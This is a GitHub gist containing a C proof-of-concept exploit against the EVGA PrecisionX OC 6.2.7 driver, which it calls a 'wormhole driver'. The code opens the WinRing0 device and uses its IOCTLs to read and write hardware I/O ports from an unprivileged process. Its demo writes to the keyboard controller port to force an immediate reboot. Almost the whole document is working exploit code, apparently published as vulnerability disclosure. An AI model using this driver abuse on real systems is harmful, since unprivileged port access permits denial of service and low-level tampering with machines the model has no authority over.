Created
January 29, 2020 13:45
-
-
Save hfiref0x/859f88bfa8adde49ea16fad7d58e3b37 to your computer and use it in GitHub Desktop.
EVGA PrecisionX OC 6.2.7 wormhole driver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <cstdio> | |
#define DEVICE_WR0_TYPE 40000 | |
#define WR0_DEVICE_LINK TEXT("\\\\.\\WinRing0_1_2_0") | |
HANDLE g_handleWR0 = INVALID_HANDLE_VALUE; | |
// | |
// Port mapped I/O access IOCTLS. | |
// | |
#define IOCTL_EVGA_WR0_WRITE_IO_PORT CTL_CODE(DEVICE_WR0_TYPE, 0x832, METHOD_BUFFERED, FILE_WRITE_ACCESS) | |
#define IOCTL_EVGA_WR0_WRITE_IO_PORT_BYTE CTL_CODE(DEVICE_WR0_TYPE, 0x836, METHOD_BUFFERED, FILE_WRITE_ACCESS) | |
#define IOCTL_EVGA_WR0_WRITE_IO_PORT_WORD CTL_CODE(DEVICE_WR0_TYPE, 0x837, METHOD_BUFFERED, FILE_WRITE_ACCESS) | |
#define IOCTL_EVGA_WR0_WRITE_IO_PORT_DWORD CTL_CODE(DEVICE_WR0_TYPE, 0x838, METHOD_BUFFERED, FILE_WRITE_ACCESS) | |
#define IOCTL_EVGA_WR0_READ_IO_PORT CTL_CODE(DEVICE_WR0_TYPE, 0x831, METHOD_BUFFERED, FILE_READ_ACCESS) | |
#define IOCTL_EVGA_WR0_READ_IO_PORT_BYTE CTL_CODE(DEVICE_WR0_TYPE, 0x833, METHOD_BUFFERED, FILE_READ_ACCESS) | |
#define IOCTL_EVGA_WR0_READ_IO_PORT_WORD CTL_CODE(DEVICE_WR0_TYPE, 0x834, METHOD_BUFFERED, FILE_READ_ACCESS) | |
#define IOCTL_EVGA_WR0_READ_IO_PORT_DWORD CTL_CODE(DEVICE_WR0_TYPE, 0x835, METHOD_BUFFERED, FILE_READ_ACCESS) | |
typedef struct _WR0_WRITE_IO_PORT_INPUT { | |
ULONG PortNumber; | |
union { | |
ULONG LongData; | |
USHORT ShortData; | |
UCHAR CharData; | |
}; | |
} WR0_WRITE_IO_PORT_INPUT, * PWR0_WRITE_IO_PORT_INPUT; | |
BYTE WINAPI READ_PORT_UCHAR( | |
_In_ WORD PortNumber) | |
{ | |
DWORD returnedLength = 0; | |
WORD valueRead = 0; | |
if (DeviceIoControl( | |
g_handleWR0, | |
IOCTL_EVGA_WR0_READ_IO_PORT_BYTE, | |
&PortNumber, | |
sizeof(PortNumber), | |
&valueRead, | |
sizeof(valueRead), | |
&returnedLength, | |
NULL)) | |
{ | |
return (BYTE)valueRead; | |
} | |
return 0; | |
} | |
BOOL WRITE_PORT_UCHAR( | |
_In_ ULONG PortNumber, | |
_In_ UCHAR Byte | |
) | |
{ | |
ULONG writeBytes = 0; | |
WR0_WRITE_IO_PORT_INPUT request; | |
request.PortNumber = PortNumber; | |
request.CharData = Byte; | |
return DeviceIoControl(g_handleWR0, | |
IOCTL_EVGA_WR0_WRITE_IO_PORT_BYTE, | |
&request, | |
sizeof(request), | |
NULL, | |
0, | |
&writeBytes, | |
NULL); | |
} | |
void DoReboot() | |
{ | |
WRITE_PORT_UCHAR(0x64, 0xFE); | |
} | |
BOOLEAN InitDriver() | |
{ | |
g_handleWR0 = CreateFile(WR0_DEVICE_LINK, | |
GENERIC_READ | GENERIC_WRITE, | |
0, | |
NULL, | |
OPEN_EXISTING, | |
0, | |
NULL); | |
if (g_handleWR0 == INVALID_HANDLE_VALUE) { | |
printf_s("[!] Unable to open device\r\n"); | |
return FALSE; | |
} | |
return TRUE; | |
} | |
int Demo1() | |
{ | |
printf_s("EVGA PrecisionX OC 6.2.7 Non-privileged access to IO ports demo\r\n"\ | |
"This code will cause system reboot, press any key for reboot\r\n"); | |
system("pause"); | |
DoReboot(); | |
// | |
// Never here. | |
// | |
CloseHandle(g_handleWR0); | |
return 0; | |
} | |
int main() | |
{ | |
if (!InitDriver()) | |
return -1; | |
return Demo1(); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment